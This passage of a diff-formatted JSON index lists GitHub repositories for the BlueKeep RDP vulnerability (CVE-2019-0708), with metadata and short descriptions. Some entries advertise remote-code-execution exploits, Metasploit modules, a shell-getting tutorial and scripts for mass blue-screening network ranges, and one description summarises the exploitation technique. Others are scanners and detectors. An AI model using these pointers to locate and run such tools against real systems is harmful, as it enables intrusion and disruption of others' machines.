"id": 189241989, + "name": "CVE-2019-0708-generate-hosts", + "full_name": "haishanzheng\/CVE-2019-0708-generate-hosts", + "owner": { + "login": "haishanzheng", + "id": 3518797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3518797?v=4", + "html_url": "https:\/\/github.com\/haishanzheng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haishanzheng\/CVE-2019-0708-generate-hosts", + "description": null, + "fork": false, + "created_at": "2019-05-29T14:29:32Z", + "updated_at": "2024-08-12T19:49:26Z", + "pushed_at": "2019-05-29T14:33:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 189265014, + "name": "BlueKeep", + "full_name": "Ekultek\/BlueKeep", + "owner": { + "login": "Ekultek", + "id": 14183473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14183473?v=4", + "html_url": "https:\/\/github.com\/Ekultek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ekultek\/BlueKeep", + "description": "Proof of concept for CVE-2019-0708", + "fork": false, + "created_at": "2019-05-29T16:53:54Z", + "updated_at": "2024-10-31T00:43:46Z", + "pushed_at": "2021-12-02T12:00:46Z", + "stargazers_count": 1174, + "watchers_count": 1174, + "has_discussions": false, + "forks_count": 345, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 345, + "watchers": 1174, + "score": 0, + "subscribers_count": 68 + }, + { + "id": 189380582, + "name": "CVE-2019-0708", + "full_name": "UraSecTeam\/CVE-2019-0708", + "owner": { + "login": "UraSecTeam", + "id": 23280827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23280827?v=4", + "html_url": "https:\/\/github.com\/UraSecTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UraSecTeam\/CVE-2019-0708", + "description": "CVE-2019-0708", + "fork": false, + "created_at": "2019-05-30T08:59:49Z", + "updated_at": "2019-05-30T18:05:14Z", + "pushed_at": "2019-05-30T18:05:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 189422199, + "name": "rdpscan-BlueKeep", + "full_name": "Gh0st0ne\/rdpscan-BlueKeep", + "owner": { + "login": "Gh0st0ne", + "id": 47971115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47971115?v=4", + "html_url": "https:\/\/github.com\/Gh0st0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gh0st0ne\/rdpscan-BlueKeep", + "description": "A quick scanner for the CVE-2019-0708 \"BlueKeep\" vulnerability. ", + "fork": false, + "created_at": "2019-05-30T13:50:32Z", + "updated_at": "2024-08-12T19:49:29Z", + "pushed_at": "2019-05-30T13:51:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 189498490, + "name": "bluekeep_CVE-2019-0708_poc_to_exploit", + "full_name": "algo7\/bluekeep_CVE-2019-0708_poc_to_exploit", + "owner": { + "login": "algo7", + "id": 11154774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11154774?v=4", + "html_url": "https:\/\/github.com\/algo7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/algo7\/bluekeep_CVE-2019-0708_poc_to_exploit", + "description": "An Attempt to Port BlueKeep PoC from @Ekultek to actual exploits", + "fork": false, + "created_at": "2019-05-31T00:04:12Z", + "updated_at": "2024-10-02T21:50:49Z", + "pushed_at": "2021-01-10T04:31:22Z", + "stargazers_count": 344, + "watchers_count": 344, + "has_discussions": false, + "forks_count": 125, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 125, + "watchers": 344, + "score": 0, + "subscribers_count": 30 + }, + { + "id": 189513712, + "name": "CVE-2019-0708", + "full_name": "JasonLOU\/CVE-2019-0708", + "owner": { + "login": "JasonLOU", + "id": 45555090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45555090?v=4", + "html_url": "https:\/\/github.com\/JasonLOU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JasonLOU\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-05-31T02:28:23Z", + "updated_at": "2024-08-12T19:49:30Z", + "pushed_at": "2019-05-31T03:35:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 189571928, + "name": "CVE-2019-0708", + "full_name": "AdministratorGithub\/CVE-2019-0708", + "owner": { + "login": "AdministratorGithub", + "id": 19834937, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19834937?v=4", + "html_url": "https:\/\/github.com\/AdministratorGithub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdministratorGithub\/CVE-2019-0708", + "description": "CVE-2019-0708批量蓝屏恶搞", + "fork": false, + "created_at": "2019-05-31T09:59:30Z", + "updated_at": "2024-08-12T19:49:32Z", + "pushed_at": "2019-07-09T09:33:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 189634467, + "name": "CVE-2019-0708", + "full_name": "umarfarook882\/CVE-2019-0708", + "owner": { + "login": "umarfarook882", + "id": 22318677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22318677?v=4", + "html_url": "https:\/\/github.com\/umarfarook882", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/umarfarook882\/CVE-2019-0708", + "description": "CVE-2019-0708 - BlueKeep (RDP)", + "fork": false, + "created_at": "2019-05-31T17:37:26Z", + "updated_at": "2024-08-12T19:49:32Z", + "pushed_at": "2020-06-14T18:43:51Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 40, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 189959275, + "name": "detect_bluekeep.py", + "full_name": "HynekPetrak\/detect_bluekeep.py", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/detect_bluekeep.py", + "description": "Python script to detect bluekeep vulnerability (CVE-2019-0708) with TLS\/SSL and x509 support", + "fork": false, + "created_at": "2019-06-03T07:49:26Z", + "updated_at": "2024-08-12T19:49:38Z", + "pushed_at": "2019-06-12T08:48:17Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluekeep", + "cve-2019-0708", + "tls" + ], + "visibility": "public", + "forks": 12, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 191301322, + "name": "CVE-2019-0708", + "full_name": "Pa55w0rd\/CVE-2019-0708", + "owner": { + "login": "Pa55w0rd", + "id": 16274549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16274549?v=4", + "html_url": "https:\/\/github.com\/Pa55w0rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pa55w0rd\/CVE-2019-0708", + "description": "CVE-2019-0708批量检测", + "fork": false, + "created_at": "2019-06-11T05:38:26Z", + "updated_at": "2024-08-12T19:49:55Z", + "pushed_at": "2021-03-31T10:07:34Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 191340467, + "name": "CVE-2019-0708-PoC", + "full_name": "at0mik\/CVE-2019-0708-PoC", + "owner": { + "login": "at0mik", + "id": 46066196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46066196?v=4", + "html_url": "https:\/\/github.com\/at0mik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/at0mik\/CVE-2019-0708-PoC", + "description": "CVE-2019-0708-PoC It is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability, this repository also contains notes on how to complete the attack.", + "fork": false, + "created_at": "2019-06-11T09:38:36Z", + "updated_at": "2024-08-12T19:49:56Z", + "pushed_at": "2021-06-19T13:18:20Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "hacking" + ], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 191491863, + "name": "CVE-2019-0708-Msf--", + "full_name": "cream-sec\/CVE-2019-0708-Msf--", + "owner": { + "login": "cream-sec", + "id": 29266660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29266660?v=4", + "html_url": "https:\/\/github.com\/cream-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cream-sec\/CVE-2019-0708-Msf--", + "description": "CVE-2019-0708-Msf-验证", + "fork": false, + "created_at": "2019-06-12T03:37:39Z", + "updated_at": "2024-08-12T19:49:58Z", + "pushed_at": "2019-06-12T03:38:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 191801650, + "name": "CVE-2019-0708", + "full_name": "ZhaoYukai\/CVE-2019-0708", + "owner": { + "login": "ZhaoYukai", + "id": 7009705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7009705?v=4", + "html_url": "https:\/\/github.com\/ZhaoYukai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZhaoYukai\/CVE-2019-0708", + "description": "蓝屏poc", + "fork": false, + "created_at": "2019-06-13T16:56:48Z", + "updated_at": "2022-03-28T14:55:04Z", + "pushed_at": "2019-05-31T08:02:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 191801669, + "name": "CVE-2019-0708-Batch-Blue-Screen", + "full_name": "ZhaoYukai\/CVE-2019-0708-Batch-Blue-Screen", + "owner": { + "login": "ZhaoYukai", + "id": 7009705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7009705?v=4", + "html_url": "https:\/\/github.com\/ZhaoYukai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZhaoYukai\/CVE-2019-0708-Batch-Blue-Screen", + "description": "改写某大佬写的0708蓝屏脚本 改为网段批量蓝屏", + "fork": false, + "created_at": "2019-06-13T16:57:00Z", + "updated_at": "2022-02-08T02:28:58Z", + "pushed_at": "2019-06-06T03:57:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 192833438, + "name": "CVE-2019-0708", + "full_name": "wdfcc\/CVE-2019-0708", + "owner": { + "login": "wdfcc", + "id": 14845586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14845586?v=4", + "html_url": "https:\/\/github.com\/wdfcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wdfcc\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-06-20T02:19:17Z", + "updated_at": "2024-08-12T19:50:15Z", + "pushed_at": "2019-06-20T02:26:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 193537193, + "name": "cve-2019-0708", + "full_name": "cvencoder\/cve-2019-0708", + "owner": { + "login": "cvencoder", + "id": 52171059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52171059?v=4", + "html_url": "https:\/\/github.com\/cvencoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cvencoder\/cve-2019-0708", + "description": "POC CVE-2019-0708 with python script!", + "fork": false, + "created_at": "2019-06-24T16:03:08Z", + "updated_at": "2023-11-18T03:10:38Z", + "pushed_at": "2019-06-24T16:03:58Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 195150954, + "name": "CVE-2019-0708-exp", + "full_name": "ze0r\/CVE-2019-0708-exp", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/CVE-2019-0708-exp", + "description": null, + "fork": false, + "created_at": "2019-07-04T01:49:22Z", + "updated_at": "2024-08-12T19:50:44Z", + "pushed_at": "2019-07-25T07:31:57Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 196871345, + "name": "cve-2019-0708", + "full_name": "mekhalleh\/cve-2019-0708", + "owner": { + "login": "mekhalleh", + "id": 5225129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5225129?v=4", + "html_url": "https:\/\/github.com\/mekhalleh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mekhalleh\/cve-2019-0708", + "description": "Metasploit module for massive Denial of Service using #Bluekeep vector.", + "fork": false, + "created_at": "2019-07-14T18:43:48Z", + "updated_at": "2024-08-12T19:51:03Z", + "pushed_at": "2019-10-01T15:31:26Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 197547695, + "name": "cve-2019-0708", + "full_name": "cve-2019-0708-poc\/cve-2019-0708", + "owner": { + "login": "cve-2019-0708-poc", + "id": 53038783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53038783?v=4", + "html_url": "https:\/\/github.com\/cve-2019-0708-poc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2019-0708-poc\/cve-2019-0708", + "description": "CVE-2019-0708 Exploit Tool", + "fork": false, + "created_at": "2019-07-18T08:41:01Z", + "updated_at": "2023-11-18T03:10:39Z", + "pushed_at": "2019-07-18T08:44:51Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 18, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 197655376, + "name": "CVE-2019-0708", + "full_name": "andripwn\/CVE-2019-0708", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/CVE-2019-0708", + "description": "Scanner PoC for CVE-2019-0708 RDP RCE vuln", + "fork": false, + "created_at": "2019-07-18T20:53:54Z", + "updated_at": "2024-08-12T19:51:12Z", + "pushed_at": "2020-09-20T14:29:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 198343084, + "name": "bluekeep", + "full_name": "0xeb-bp\/bluekeep", + "owner": { + "login": "0xeb-bp", + "id": 53204152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53204152?v=4", + "html_url": "https:\/\/github.com\/0xeb-bp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeb-bp\/bluekeep", + "description": "Public work for CVE-2019-0708", + "fork": false, + "created_at": "2019-07-23T03:15:53Z", + "updated_at": "2024-08-24T09:50:01Z", + "pushed_at": "2019-11-19T02:43:38Z", + "stargazers_count": 289, + "watchers_count": 289, + "has_discussions": false, + "forks_count": 91, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 91, + "watchers": 289, + "score": 0, + "subscribers_count": 21 + }, + { + "id": 198731225, + "name": "CVE-2019-0708", + "full_name": "ntkernel0\/CVE-2019-0708", + "owner": { + "login": "ntkernel0", + "id": 46866847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46866847?v=4", + "html_url": "https:\/\/github.com\/ntkernel0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ntkernel0\/CVE-2019-0708", + "description": "收集网上CVE-2018-0708的poc和exp(目前没有找到exp)", + "fork": false, + "created_at": "2019-07-25T01:05:21Z", + "updated_at": "2024-08-12T19:51:22Z", + "pushed_at": "2019-07-25T01:03:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 202911823, + "name": "Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-", + "full_name": "dorkerdevil\/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-", + "description": "rce exploit , made to work with pocsuite3", + "fork": false, + "created_at": "2019-08-17T17:23:53Z", + "updated_at": "2024-08-12T19:52:05Z", + "pushed_at": "2019-08-19T02:52:11Z", + "stargazers_count": 119, + "watchers_count": 119, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 119, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 202951481, + "name": "bluekeep", + "full_name": "turingcompl33t\/bluekeep", + "owner": { + "login": "turingcompl33t", + "id": 19956905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19956905?v=4", + "html_url": "https:\/\/github.com\/turingcompl33t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/turingcompl33t\/bluekeep", + "description": "Research Regarding CVE-2019-0708.", + "fork": false, + "created_at": "2019-08-18T02:34:31Z", + "updated_at": "2024-08-12T19:52:06Z", + "pushed_at": "2019-11-04T01:15:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 203477227, + "name": "CVE-2019-0708-test", + "full_name": "fade-vivida\/CVE-2019-0708-test", + "owner": { + "login": "fade-vivida", + "id": 38774342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38774342?v=4", + "html_url": "https:\/\/github.com\/fade-vivida", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fade-vivida\/CVE-2019-0708-test", + "description": null, + "fork": false, + "created_at": "2019-08-21T00:48:55Z", + "updated_at": "2024-08-12T19:52:12Z", + "pushed_at": "2019-11-28T01:38:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 206050892, + "name": "CVE-2019-0708", + "full_name": "skommando\/CVE-2019-0708", + "owner": { + "login": "skommando", + "id": 22767889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22767889?v=4", + "html_url": "https:\/\/github.com\/skommando", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skommando\/CVE-2019-0708", + "description": "CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。", + "fork": false, + "created_at": "2019-09-03T10:25:48Z", + "updated_at": "2024-08-12T19:52:37Z", + "pushed_at": "2019-09-12T02:29:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 206863569, + "name": "msf-module-CVE-2019-0708", + "full_name": "RickGeex\/msf-module-CVE-2019-0708", + "owner": { + "login": "RickGeex", + "id": 7975904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7975904?v=4", + "html_url": "https:\/\/github.com\/RickGeex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RickGeex\/msf-module-CVE-2019-0708", + "description": "Metasploit module for CVE-2019-0708 (BlueKeep) - https:\/\/github.com\/rapid7\/metasploit-framework\/tree\/5a0119b04309c8e61b44763ac08811cd3ecbbf8d\/modules\/exploits\/windows\/rdp", + "fork": false, + "created_at": "2019-09-06T19:46:03Z", + "updated_at": "2024-08-12T19:52:44Z", + "pushed_at": "2019-09-07T09:41:22Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 206893335, + "name": "CVE-2019-0708", + "full_name": "wqsemc\/CVE-2019-0708", + "owner": { + "login": "wqsemc", + "id": 36132717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36132717?v=4", + "html_url": "https:\/\/github.com\/wqsemc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wqsemc\/CVE-2019-0708", + "description": "initial exploit for CVE-2019-0708, BlueKeep CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data\/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.", + "fork": false, + "created_at": "2019-09-07T00:28:45Z", + "updated_at": "2024-08-12T19:52:44Z", + "pushed_at": "2019-09-16T10:35:57Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 206926531, + "name": "CVE-2019-0708RDP-MSF", + "full_name": "Micr067\/CVE-2019-0708RDP-MSF", + "owner": { + "login": "Micr067", + "id": 49861012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49861012?v=4", + "html_url": "https:\/\/github.com\/Micr067", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Micr067\/CVE-2019-0708RDP-MSF", + "description": "CVE-2019-0708RDP MSF", + "fork": false, + "created_at": "2019-09-07T06:32:25Z", + "updated_at": "2019-09-07T06:32:25Z", + "pushed_at": "2019-09-07T06:32:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 206932731, + "name": "CVE-2019-0708", + "full_name": "FrostsaberX\/CVE-2019-0708", + "owner": { + "login": "FrostsaberX", + "id": 24857203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24857203?v=4", + "html_url": "https:\/\/github.com\/FrostsaberX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FrostsaberX\/CVE-2019-0708", + "description": "CVE-2019-0708 With Metasploit-Framework Exploit", + "fork": false, + "created_at": "2019-09-07T07:32:14Z", + "updated_at": "2024-08-12T19:52:45Z", + "pushed_at": "2019-09-07T08:50:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 206939682, + "name": "CVE-2019-0708-RCE", + "full_name": "0x6b7966\/CVE-2019-0708-RCE", + "owner": { + "login": "0x6b7966", + "id": 22814832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22814832?v=4", + "html_url": "https:\/\/github.com\/0x6b7966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x6b7966\/CVE-2019-0708-RCE", + "description": "CVE-2019-0708 RCE远程代码执行getshell教程", + "fork": false, + "created_at": "2019-09-07T08:35:03Z", + "updated_at": "2021-07-26T08:14:22Z", + "pushed_at": "2019-09-07T05:35:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 206976374, + "name": "CVE-2019-0708-EXP-MSF-", + "full_name": "qing-root\/CVE-2019-0708-EXP-MSF-", + "owner": { + "login": "qing-root", + "id": 30001685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30001685?v=4", + "html_url": "https:\/\/github.com\/qing-root", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qing-root\/CVE-2019-0708-EXP-MSF-", + "description": "CVE-2019-0708-EXP(MSF) Vulnerability exploit program for cve-2019-0708", + "fork": false, + "created_at": "2019-09-07T14:02:50Z", + "updated_at": "2023-09-28T11:05:55Z", + "pushed_at": "2019-09-07T15:07:24Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 207703935, + "name": "CVE-2019-0708", + "full_name": "distance-vector\/CVE-2019-0708", + "owner": { + "login": "distance-vector", + "id": 35881006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35881006?v=4", + "html_url": "https:\/\/github.com\/distance-vector", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/distance-vector\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-09-11T02:19:19Z", + "updated_at": "2024-08-12T19:52:53Z", + "pushed_at": "2019-09-11T02:23:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 207790184, + "name": "CVE-2019-0708-test", + "full_name": "0xFlag\/CVE-2019-0708-test", + "owner": { + "login": "0xFlag", + "id": 54313514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54313514?v=4", + "html_url": "https:\/\/github.com\/0xFlag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xFlag\/CVE-2019-0708-test", + "description": "CVE-2019-0708 C#验证漏洞", + "fork": false, + "created_at": "2019-09-11T10:58:04Z", + "updated_at": "2024-08-12T19:52:54Z", + "pushed_at": "2019-09-13T01:46:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 